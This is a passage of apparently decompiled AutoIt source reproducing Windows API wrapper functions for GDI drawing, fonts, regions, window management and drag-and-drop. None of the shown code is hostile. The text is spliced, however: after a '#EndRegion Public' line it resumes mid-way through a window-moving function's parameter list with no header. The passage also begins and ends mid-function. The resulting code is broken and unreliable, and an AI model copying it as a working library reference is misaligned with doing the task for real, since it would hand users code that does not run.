ENDIF LOCAL $HBITMAP = _WINAPI_CREATEDIBSECTION (0 , $TBITMAPINFO , 0 , $__G_VEXT ) IF NOT $HBITMAP THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $HBITMAP ENDFUNC FUNC _WINAPI_CREATEDIBSECTION ($HDC , $TBITMAPINFO , $IUSAGE , BYREF $PBITS , $HSECTION = 0 , $IOFFSET = 0 ) $PBITS = 0 LOCAL $ARET = DLLCALL ("gdi32.dll" , "handle" , 
"CreateDIBSection" , "handle" , $HDC , "struct*" , $TBITMAPINFO , "uint" , $IUSAGE , "ptr*" , 0 , "handle" , $HSECTION , "dword" , $IOFFSET ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) $PBITS = $ARET [4 ] RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEDIBCOLORTABLE (CONST BYREF $ACOLORTABLE , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($ACOLORTABLE , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TCOLORTABLE = DLLSTRUCTCREATE ("dword[" & ($IEND - $ISTART + 1 ) & "]" ) LOCAL $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TCOLORTABLE , 1 , _WINAPI_SWITCHCOLOR (__RGB ($ACOLORTABLE [$I ] ) ) , $ICOUNT ) $ICOUNT += 1 NEXT RETURN $TCOLORTABLE ENDFUNC FUNC _WINAPI_CREATEFONT ($IHEIGHT , $IWIDTH , $IESCAPE = 0 , $IORIENTN = 0 , $IWEIGHT = $__WINAPICONSTANT_FW_NORMAL , $BITALIC = FALSE , $BUNDERLINE = FALSE , $BSTRIKEOUT = FALSE , $ICHARSET = $__WINAPICONSTANT_DEFAULT_CHARSET , $IOUTPUTPREC = $__WINAPICONSTANT_OUT_DEFAULT_PRECIS , $ICLIPPREC = $__WINAPICONSTANT_CLIP_DEFAULT_PRECIS , $IQUALITY = $__WINAPICONSTANT_DEFAULT_QUALITY , $IPITCH = 0 , $SFACE = "Arial" ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateFontW" , "int" , $IHEIGHT , "int" , $IWIDTH , "int" , $IESCAPE , "int" , $IORIENTN , "int" , $IWEIGHT , "dword" , $BITALIC , "dword" , $BUNDERLINE , "dword" , $BSTRIKEOUT , "dword" , $ICHARSET , "dword" , $IOUTPUTPREC , "dword" , $ICLIPPREC , "dword" , $IQUALITY , "dword" , $IPITCH , "wstr" , $SFACE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATEFONTINDIRECT ($TLOGFONT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateFontIndirectW" , "struct*" , $TLOGFONT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATERECTRGN ($ILEFTRECT , $ITOPRECT , $IRIGHTRECT , $IBOTTOMRECT ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateRectRgn" , "int" , 
$ILEFTRECT , "int" , $ITOPRECT , "int" , $IRIGHTRECT , "int" , $IBOTTOMRECT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATEROUNDRECTRGN ($ILEFTRECT , $ITOPRECT , $IRIGHTRECT , $IBOTTOMRECT , $IWIDTHELLIPSE , $IHEIGHTELLIPSE ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateRoundRectRgn" , "int" , $ILEFTRECT , "int" , $ITOPRECT , "int" , $IRIGHTRECT , "int" , $IBOTTOMRECT , "int" , $IWIDTHELLIPSE , "int" , $IHEIGHTELLIPSE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CREATESOLIDBRUSH ($ICOLOR ) LOCAL $ARESULT = DLLCALL ("gdi32.dll" , "handle" , "CreateSolidBrush" , "INT" , $ICOLOR ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETBITMAPDIMENSION ($HBITMAP ) LOCAL $TOBJ = DLLSTRUCTCREATE ($TAGBITMAP ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "int" , "GetObject" , "handle" , $HBITMAP , "int" , DLLSTRUCTGETSIZE ($TOBJ ) , "struct*" , $TOBJ ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN _WINAPI_CREATESIZE (DLLSTRUCTGETDATA ($TOBJ , "bmWidth" ) , DLLSTRUCTGETDATA ($TOBJ , "bmHeight" ) ) ENDFUNC FUNC _WINAPI_GETSYSCOLORBRUSH ($IINDEX ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "handle" , "GetSysColorBrush" , "int" , $IINDEX ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETTEXTEXTENTPOINT32 ($HDC , $STEXT ) LOCAL $TSIZE = DLLSTRUCTCREATE ($TAGSIZE ) LOCAL $ISIZE = STRINGLEN ($STEXT ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "bool" , "GetTextExtentPoint32W" , "handle" , $HDC , "wstr" , $STEXT , "int" , $ISIZE , "struct*" , $TSIZE ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TSIZE ENDFUNC FUNC _WINAPI_GETTEXTMETRICS ($HDC ) LOCAL $TTEXTMETRIC = DLLSTRUCTCREATE ($TAGTEXTMETRIC ) LOCAL $ARET = DLLCALL ("gdi32.dll" , "bool" , "GetTextMetricsW" , "handle" , $HDC , 
"struct*" , $TTEXTMETRIC ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TTEXTMETRIC ENDFUNC FUNC _WINAPI_GETWINDOWRGN ($HWND , $HRGN ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "GetWindowRgn" , "hwnd" , $HWND , "handle" , $HRGN ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_ISALPHABITMAP ($HBITMAP ) $HBITMAP = _WINAPI_COPYBITMAP ($HBITMAP ) IF NOT $HBITMAP THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) LOCAL $ARET , $IERROR = 0 DO LOCAL $TDIB = DLLSTRUCTCREATE ($TAGDIBSECTION ) IF (NOT _WINAPI_GETOBJECT ($HBITMAP , DLLSTRUCTGETSIZE ($TDIB ) , $TDIB ) ) OR (DLLSTRUCTGETDATA ($TDIB , "bmBitsPixel" ) <> 32 ) OR (DLLSTRUCTGETDATA ($TDIB , "biCompression" ) ) THEN $IERROR = 1 EXITLOOP ENDIF $ARET = DLLCALL ("user32.dll" , "int" , "CallWindowProc" , "ptr" , __ALPHAPROC () , "ptr" , 0 , "uint" , 0 , "struct*" , $TDIB , "ptr" , 0 ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN $IERROR = @ERROR + 10 EXITLOOP ENDIF UNTIL 1 _WINAPI_DELETEOBJECT ($HBITMAP ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PTINRECT (BYREF $TRECT , BYREF $TPOINT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "PtInRect" , "struct*" , $TRECT , "struct" , $TPOINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_REDRAWWINDOW ($HWND , $TRECT = 0 , $HREGION = 0 , $IFLAGS = 5 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "RedrawWindow" , "hwnd" , $HWND , "struct*" , $TRECT , "handle" , $HREGION , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWRGN ($HWND , $HRGN , $BREDRAW = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "int" , "SetWindowRgn" , "hwnd" , $HWND , "handle" , $HRGN , "bool" , $BREDRAW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public 
, $IHEIGHT , $BREPAINT = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "MoveWindow" , "hwnd" , $HWND , "int" , $IX , "int" , $IY , "int" , $IWIDTH , "int" , $IHEIGHT , "bool" , $BREPAINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETFOCUS ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "SetFocus" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETFONT ($HWND , $HFONT , $BREDRAW = TRUE ) _SENDMESSAGE ($HWND , $__WINAPICONSTANT_WM_SETFONT , $HFONT , $BREDRAW , 0 , "hwnd" ) ENDFUNC FUNC _WINAPI_SETPARENT ($HWNDCHILD , $HWNDPARENT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "SetParent" , "hwnd" , $HWNDCHILD , "hwnd" , $HWNDPARENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWPOS ($HWND , $HAFTER , $IX , $IY , $ICX , $ICY , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetWindowPos" , "hwnd" , $HWND , "hwnd" , $HAFTER , "int" , $IX , "int" , $IY , "int" , $ICX , "int" , $ICY , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWTEXT ($HWND , $STEXT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetWindowTextW" , "hwnd" , $HWND , "wstr" , $STEXT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SHOWWINDOW ($HWND , $ICMDSHOW = 5 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "ShowWindow" , "hwnd" , $HWND , "int" , $ICMDSHOW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_UPDATEWINDOW ($HWND ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "UpdateWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC 
__WINAPI_ENUMWINDOWSADD ($HWND , $SCLASS = "" ) IF $SCLASS = "" THEN $SCLASS = _WINAPI_GETCLASSNAME ($HWND ) $__G_AWINLIST_WINAPI [0 ] [0 ] += 1 LOCAL $ICOUNT = $__G_AWINLIST_WINAPI [0 ] [0 ] IF $ICOUNT >= $__G_AWINLIST_WINAPI [0 ] [1 ] THEN REDIM $__G_AWINLIST_WINAPI [$ICOUNT + 64 ] [2 ] $__G_AWINLIST_WINAPI [0 ] [1 ] += 64 ENDIF $__G_AWINLIST_WINAPI [$ICOUNT ] [0 ] = $HWND $__G_AWINLIST_WINAPI [$ICOUNT ] [1 ] = $SCLASS ENDFUNC FUNC __WINAPI_ENUMWINDOWSCHILD ($HWND , $BVISIBLE = TRUE ) $HWND = _WINAPI_GETWINDOW ($HWND , $GW_CHILD ) WHILE $HWND <> 0 IF (NOT $BVISIBLE ) OR _WINAPI_ISWINDOWVISIBLE ($HWND ) THEN __WINAPI_ENUMWINDOWSADD ($HWND ) __WINAPI_ENUMWINDOWSCHILD ($HWND , $BVISIBLE ) ENDIF $HWND = _WINAPI_GETWINDOW ($HWND , $GW_HWNDNEXT ) WEND ENDFUNC FUNC __WINAPI_ENUMWINDOWSINIT () REDIM $__G_AWINLIST_WINAPI [64 ] [2 ] $__G_AWINLIST_WINAPI [0 ] [0 ] = 0 $__G_AWINLIST_WINAPI [0 ] [1 ] = 64 ENDFUNC #EndRegion Internal Functions GLOBAL CONST $FLASHW_CAPTION = 1 GLOBAL CONST $FLASHW_TRAY = 2 GLOBAL CONST $FLASHW_TIMER = 4 GLOBAL CONST $FLASHW_TIMERNOFG = 12 GLOBAL CONST $TAGUPDATELAYEREDWINDOWINFO = "dword Size;hwnd hDstDC;long DstX;long DstY;long cX;long cY;hwnd hSrcDC;long SrcX;long SrcY;dword crKey;byte BlendOp;byte BlendFlags;byte Alpha;byte AlphaFormat;dword Flags;long DirtyLeft;long DirtyTop;long DirtyRight;long DirtyBottom" GLOBAL CONST $TAGWINDOWINFO = "dword Size;struct;long rWindow[4];endstruct;struct;long rClient[4];endstruct;dword Style;dword ExStyle;dword WindowStatus;uint cxWindowBorders;uint cyWindowBorders;word atomWindowType;word CreatorVersion" GLOBAL CONST $TAGWNDCLASS = "uint Style;ptr hWndProc;int ClsExtra;int WndExtra;ptr hInstance;ptr hIcon;ptr hCursor;ptr hBackground;ptr MenuName;ptr ClassName" GLOBAL CONST $TAGWNDCLASSEX = "uint Size;uint Style;ptr hWndProc;int ClsExtra;int WndExtra;ptr hInstance;ptr hIcon;ptr hCursor;ptr hBackground;ptr MenuName;ptr ClassName;ptr hIconSm" GLOBAL CONST $TAGFLASHWINFO = "uint Size;hwnd hWnd;dword 
Flags;uint Count;dword TimeOut" FUNC _WINAPI_ADJUSTWINDOWRECTEX (BYREF $TRECT , $ISTYLE , $IEXSTYLE = 0 , $BMENU = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "AdjustWindowRectEx" , "struct*" , $TRECT , "dword" , $ISTYLE , "bool" , $BMENU , "dword" , $IEXSTYLE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ANIMATEWINDOW ($HWND , $IFLAGS , $IDURATION = 1000 ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "AnimateWindow" , "hwnd" , $HWND , "dword" , $IDURATION , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_BEGINDEFERWINDOWPOS ($IAMOUNT = 1 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "BeginDeferWindowPos" , "int" , $IAMOUNT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_BRINGWINDOWTOTOP ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "BringWindowToTop" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_BROADCASTSYSTEMMESSAGE ($IMSG , $WPARAM = 0 , $LPARAM = 0 , $IFLAGS = 0 , $IRECIPIENTS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "long" , "BroadcastSystemMessageW" , "dword" , $IFLAGS , "dword*" , $IRECIPIENTS , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR OR ($ARET [0 ] = + 4294967295 ) THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN SETEXTENDED ($ARET [2 ] , $ARET [0 ] ) ENDFUNC FUNC _WINAPI_CALLWINDOWPROC ($PPREVWNDFUNC , $HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "lresult" , "CallWindowProc" , "ptr" , $PPREVWNDFUNC , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CALLWINDOWPROCW ($PPREVWNDPROC , $HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , 
"CallWindowProcW" , "ptr" , $PPREVWNDPROC , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CASCADEWINDOWS ($AWNDS , $TRECT = 0 , $HPARENT = 0 , $IFLAGS = 0 , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($AWNDS , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ICOUNT = $IEND - $ISTART + 1 LOCAL $TWNDS = DLLSTRUCTCREATE ("hwnd[" & $ICOUNT & "]" ) $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TWNDS , 1 , $AWNDS [$I ] , $ICOUNT ) $ICOUNT += 1 NEXT LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "CascadeWindows" , "hwnd" , $HPARENT , "uint" , $IFLAGS , "struct*" , $TRECT , "uint" , $ICOUNT + 4294967295 , "struct*" , $TWNDS ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CHANGEWINDOWMESSAGEFILTEREX ($HWND , $IMSG , $IACTION ) LOCAL $TCFS , $ARET IF $HWND AND ($__WINVER > 1536 ) THEN LOCAL CONST $TAGCHANGEFILTERSTRUCT = "dword cbSize; dword ExtStatus" $TCFS = DLLSTRUCTCREATE ($TAGCHANGEFILTERSTRUCT ) DLLSTRUCTSETDATA ($TCFS , 1 , DLLSTRUCTGETSIZE ($TCFS ) ) $ARET = DLLCALL ("user32.dll" , "bool" , "ChangeWindowMessageFilterEx" , "hwnd" , $HWND , "uint" , $IMSG , "dword" , $IACTION , "struct*" , $TCFS ) ELSE $TCFS = 0 $ARET = DLLCALL ("user32.dll" , "bool" , "ChangeWindowMessageFilter" , "uint" , $IMSG , "dword" , $IACTION ) ENDIF IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN SETEXTENDED (DLLSTRUCTGETDATA ($TCFS , 2 ) , 1 ) ENDFUNC FUNC _WINAPI_CHILDWINDOWFROMPOINTEX ($HWND , $TPOINT , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "ChildWindowFromPointEx" , "hwnd" , $HWND , "struct" , $TPOINT , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CLOSEWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , 
"bool" , "CloseWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DEFERWINDOWPOS ($HINFO , $HWND , $HAFTER , $IX , $IY , $IWIDTH , $IHEIGHT , $IFLAGS ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "DeferWindowPos" , "handle" , $HINFO , "hwnd" , $HWND , "hwnd" , $HAFTER , "int" , $IX , "int" , $IY , "int" , $IWIDTH , "int" , $IHEIGHT , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DEFWINDOWPROC ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "lresult" , "DefWindowProc" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_DEFWINDOWPROCW ($HWND , $IMSG , $WPARAM , $LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "DefWindowProcW" , "hwnd" , $HWND , "uint" , $IMSG , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DEREGISTERSHELLHOOKWINDOW ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "DeregisterShellHookWindow" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DRAGACCEPTFILES ($HWND , $BACCEPT = TRUE ) DLLCALL ("shell32.dll" , "none" , "DragAcceptFiles" , "hwnd" , $HWND , "bool" , $BACCEPT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_DRAGFINISH ($HDROP ) DLLCALL ("shell32.dll" , "none" , "DragFinish" , "handle" , $HDROP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_DRAGQUERYFILEEX ($HDROP , $IFLAG = 0 ) LOCAL $ARET = DLLCALL ("shell32.dll" , "uint" , "DragQueryFileW" , "handle" , $HDROP , "uint" , + 4294967295 , "ptr" , 0 , "uint" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF NOT $ARET [0 ] 
THEN RETURN SETERROR (10 , 0 , 0 ) LOCAL $ICOUNT = $ARET [0 ] LOCAL $ARESULT [$ICOUNT + 1 ] FOR $I = 0 TO $ICOUNT + 4294967295 $ARET = DLLCALL ("shell32.dll" , "uint" , "DragQueryFileW" , "handle" , $HDROP , "uint" , $I , "wstr" , "" , "uint" , 4096 ) IF NOT $ARET [0 ] THEN RETURN SETERROR (11 , 0 , 0 ) IF $IFLAG THEN LOCAL $BDIR = _WINAPI_PATHISDIRECTORY ($ARET [3 ] ) IF (($IFLAG = 1 ) AND $BDIR ) OR (($IFLAG = 2 ) AND NOT $BDIR ) THEN CONTINUELOOP ENDIF ENDIF $ARESULT [$I + 1 ] = $ARET [3 ] $ARESULT [0 ] += 1 NEXT IF NOT $ARESULT [0 ] THEN RETURN SETERROR (12 , 0 , 0 ) __INC ($ARESULT , + 4294967295 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_DRAGQUERYPOINT ($HDROP ) LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) LOCAL $ARET = DLLCALL ("shell32.dll" , "bool" , "DragQueryPoint" , "handle" , $HDROP , "struct*" , $TPOINT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_ENDDEFERWINDOWPOS ($HINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EndDeferWindowPos" , "handle" , $HINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ENUMCHILDWINDOWS ($HWND , $BVISIBLE = TRUE ) IF NOT _WINAPI_GETWINDOW ($HWND , 5 ) THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumWindowsProc" , "bool" , "hwnd;lparam" ) DIM $__G_VENUM [101 ] [2 ] = [[0 ] ] DLLCALL ("user32.dll" , "bool" , "EnumChildWindows" , "hwnd" , $HWND , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , $BVISIBLE ) IF @ERROR OR NOT $__G_VENUM [0 ] [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_FINDWINDOW ($SCLASSNAME , $SWINDOWNAME ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "FindWindowW" , "wstr" , $SCLASSNAME , "wstr" , $SWINDOWNAME ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT 
[0 ] ENDFUNC FUNC _WINAPI_FLASHWINDOW ($HWND , $BINVERT = TRUE ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "FlashWindow" , "hwnd" , $HWND , "bool" , $BINVERT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_FLASHWINDOWEX ($HWND , $IFLAGS = 3 , $ICOUNT = 3 , $ITIMEOUT = 0 ) LOCAL $TFLASH = DLLSTRUCTCREATE ($TAGFLASHWINFO ) LOCAL $IFLASH = DLLSTRUCTGETSIZE ($TFLASH ) LOCAL $IMODE = 0 IF BITAND ($IFLAGS , 1 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_CAPTION ) IF BITAND ($IFLAGS , 2 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_TRAY ) IF BITAND ($IFLAGS , 4 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_TIMER ) IF BITAND ($IFLAGS , 8 ) <> 0 THEN $IMODE = BITOR ($IMODE , $FLASHW_TIMERNOFG ) DLLSTRUCTSETDATA ($TFLASH , "Size" , $IFLASH ) DLLSTRUCTSETDATA ($TFLASH , "hWnd" , $HWND ) DLLSTRUCTSETDATA ($TFLASH , "Flags" , $IMODE ) DLLSTRUCTSETDATA ($TFLASH , "Count" , $ICOUNT ) DLLSTRUCTSETDATA ($TFLASH , "Timeout" , $ITIMEOUT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "FlashWindowEx" , "struct*" , $TFLASH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETANCESTOR ($HWND , $IFLAGS = 1 ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetAncestor" , "hwnd" , $HWND , "uint" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETCLASSINFOEX ($SCLASS , $HINSTANCE = 0 ) LOCAL $STYPEOFCLASS = "ptr" IF ISSTRING ($SCLASS ) THEN $STYPEOFCLASS = "wstr" ENDIF LOCAL $TWNDCLASSEX = DLLSTRUCTCREATE ($TAGWNDCLASSEX ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetClassInfoExW" , "handle" , $HINSTANCE , $STYPEOFCLASS , $SCLASS , "struct*" , $TWNDCLASSEX ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TWNDCLASSEX ENDFUNC FUNC _WINAPI_GETCLASSLONGEX ($HWND , $IINDEX ) LOCAL $ARET IF @AUTOITX64 THEN $ARET = DLLCALL ("user32.dll" , "ulong_ptr" , 
"GetClassLongPtrW" , "hwnd" , $HWND , "int" , $IINDEX ) ELSE $ARET = DLLCALL ("user32.dll" , "dword" , "GetClassLongW" , "hwnd" , $HWND , "int" , $IINDEX ) ENDIF IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCLIENTHEIGHT ($HWND ) LOCAL $TRECT = _WINAPI_GETCLIENTRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Bottom" ) - DLLSTRUCTGETDATA ($TRECT , "Top" ) ENDFUNC FUNC _WINAPI_GETCLIENTWIDTH ($HWND ) LOCAL $TRECT = _WINAPI_GETCLIENTRECT ($HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TRECT , "Right" ) - DLLSTRUCTGETDATA ($TRECT , "Left" ) ENDFUNC FUNC _WINAPI_GETDLGITEM ($HWND , $IITEMID ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "GetDlgItem" , "hwnd" , $HWND , "int" , $IITEMID ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] 